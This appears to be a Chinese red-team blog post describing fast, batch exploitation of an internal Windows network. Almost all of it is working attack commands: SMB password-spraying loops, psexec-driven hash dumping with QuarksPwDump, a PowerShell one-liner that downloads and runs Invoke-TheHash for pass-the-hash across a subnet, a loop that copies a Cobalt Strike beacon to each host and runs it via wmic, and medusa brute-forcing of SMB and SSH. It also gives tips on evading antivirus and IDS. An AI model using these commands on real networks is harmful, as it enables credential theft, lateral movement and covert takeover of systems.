内网快速批量化利用实践 [一]

  • A+
所属分类:安全文章

内网快速批量化利用实践 [一]


0x01  利用前提

  • 已经事先拿到某个管理员的明文密码或密码hash,假设为 user: Administrator [特别注意,此处最好就用win系统内建的administrator用户去跑,在win7/2008之后系统中默认已不再允许rid非500的管理员远程连接] / pwd: Admin12345

  • 假设前期通过内网存活主机探测,我们已经锁定了一批有价值的且开了445端口的内网windows机器,已经全部整理好放在了host.txt文件中

  • 最终想实现的目的,很简单,极速批量内网口令探测, 批量搜集内网机器的管理员hash,对内网机器进行批量hash传递尝试,内网机器批量shell上线...其它的更多用法,请自行延伸,目的就是想通过这种方式快速扩展内网机器


0x02  针对内网所有开了445端口的windows主机进行批量口令探测

    下面这句话的意思很简单,就是把撞成功的机器ip都存到指定文件中,之后删除连接

# for /f %i in (host.txt) do net use \%iadmin$ /user:"administrator" "Admin12345" && if %errorlevel% equ 0 ( echo %i >> c:windowstemplogin_succeed.txt ) && net use \%iadmin$ /del

内网快速批量化利用实践 [一]

以下便是登录成功的内网机器列表

内网快速批量化利用实践 [一]


    注: 实战中,尤其在一些严苛的内网环境下,请自行在语句中适当加上延迟,尽可能避免一些防护干扰,我相信,只要不是频率非常非常高的不停的net use 动作,一般的防护都会无视



0x03  尝试批量搜集内网所有开了445端口的windows机器管理员hash

# for /f %i in (host.txt) do psexec \%i -accepteula -u administrator -p Admin12345 -c C:ToolsQuarksPwDump.exe -dhl -o C:windowstemp%i.txt && move /y \%iadmin$temp%i.txt c:windowstemp

内网快速批量化利用实践 [一]

批量搜集内网机器hash的实际效果

内网快速批量化利用实践 [一]


    注: 首先把QuarksPwDump.exe先传到目标机器上,工具本身需要免杀,好在有源码,可以克服,另外,此工具在windows 2016下无法运行, psexec远程创建服务,动作太敏感且容易有残留,大部分杀软会拦截,实战中不妨换成schtasks,at,或者wmic...


0x04  借助Powershell快速对目标内网批量进行hash传递尝试

    假设目标内网机器能正常出网,可直接远程加载执行 [此处为工作组环境下,如果在域内,直接把-Domain选项换成对应的目标域名即可]

# powershell -exec bypass

PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-TheHash.ps1');

PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');

PS > Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain . -Username administrator -Hash ccef208c6485269c20db2cad21734fe7

内网快速批量化利用实践 [一]

对于内网断网机可直接本地加载执行,如下

PS > Import-Module .Invoke-TheHash.ps1

PS > Import-Module .Invoke-WMIExec.ps1

PS > Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain . -Username administrator -Hash ccef208c6485269c20db2cad21734fe7

内网快速批量化利用实践 [一]


    注: 特别注意,Invoke-TheHash.ps1本身只适用于08r2以后的系统,另外,对于一些老系统,比如,windows2003 / xp 它可能照顾不到,原因很明显,smblogin用的是powershell,但那些老系统上并没有ps,有一定局限性,知晓即可


0x05  内网机器批量shell上线

    话的意思很明了,成功连上后立马把beacon.exe拷到远程机器的c:windowstemp目录下[当然,你也可以放到其它临时目录中,比如,当前用户得临时目录,防止不能写的问题],然后再wmic远程执行

# for /f %i in (host.txt) do net use \%iadmin$ /user:"administrator" "Admin12345" && copy C:Toolsbeacon.exe \%iadmin$temp && wmic /node:%i /user:administrator /password:Admin12345 PROCESS call create "\%iadmin$tempbeacon.exe" && net use \%iadmin$ /del

内网快速批量化利用实践 [一]

最终实现批量上线的效果,如下

内网快速批量化利用实践 [一]


注: 实战中的Beacon.exe肯定要自行免杀,正常情况下,exe在执行完后肯定是要执行自毁的,当然,cs生成的默认就不行了,远程机器最好用机器名不要用ip,不然在wmic时可能会出问题,另外,wmic一样也可以换成schtasks,at,smbexec[特别注意此处,如果直接以administrator账号来远程执行的话,默认回来的shell就直接是system权限]..


0x06  关于各类外部工具的利用

    尝试直接把medusa通过socks挂到目标内网中,然后把内网所有开了445端口的windows机器快速跑一遍,相比直接硬怼字典,这种方式更加精悍靠谱,每搜集到一个管理员密码,就拿着medusa去批量跑一遍,以此搜集更多的管理员密码,循环往复的轮

# medusa -H target.txt -u administrator -e ns -p Admin12345 -t 2 -T 2 -f -M smbnt -R 3 -O smb_login_succeed.txt

内网快速批量化利用实践 [一]

    同样的方式,对目标内网中所有linux的ssh进行批量探测,实战中,非常不建议写脚本挂着一直跑,没有任何意义,如果你这么干,不出意外的情况下,运维的监控那边此处是一定看的一清二楚

# medusa -H target.txt -u root -e ns -p abc123$% -t 2 -T 2 -f -M ssh -R 3 -O ssh_login_succeed.txt

内网快速批量化利用实践 [一]

    

    注: 把工具挂到socks下,有些ids可能就不会拦,只是可能,如果拦了,就加密,单层加密不行,试试多层不同加密...



小结:

    再次强调,此处只为提供一些最简单实用且相对高效安全的内网渗透思路,实战利用过程中,肯定还会遇到各种各样的问题,都再正常不过,这就需要弟兄们根据自己目标的实际内网环境,去针对性的改进,个人永远坚信,一篇短短的文章是远不足以帮你解决所有实际渗透中的问题的,还是那句话,尽量不要在目标机器上留下太多工具,能依托目标系统现有工具搞定的就直接用自带工具搞定,再不济,也可以试着挂到socks或者http tunnel下搞,实在没办法代理很不稳定,又不能出网,再想办法传工具不迟,更多更优秀精悍的思路,非常期待能跟弟兄们一起深入讨论,写的仓促,不足之处,多斧正 :)


最近有些忙,所以才耽搁这么久没更新,实在抱歉,欢迎弟兄们积极转发留言,感谢 


    更多更优质的精品原创实用技术干货分享,和众多资深apt及红队玩家一起深度无缝交流,欢迎微信扫码加入小密圈,另外,关于本文完整pdf原件现也已分享到自己密圈中,我们会在那里一直等你

内网快速批量化利用实践 [一]



更多优质公开技术分享,欢迎关注个人公众号 "红队攻防揭秘",另,同时欢迎大家的无私 转发 , 打赏 , 点赞 与 留言, 非常感谢

内网快速批量化利用实践 [一]


注:  写文不易,公众号之外的转载请务必通过此公众号事先与作者本人联系并严格声明文章出处,非常感谢 !



另:  本公众号的所有文章仅作攻防研究学习之用,严禁私自用所学技术去从事一切未经合法授权的入侵攻击破坏活动,因此所产生的一切不良后果与本文作者及该公众号无关 


本文始发于微信公众号(红队防线):内网快速批量化利用实践 [一]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: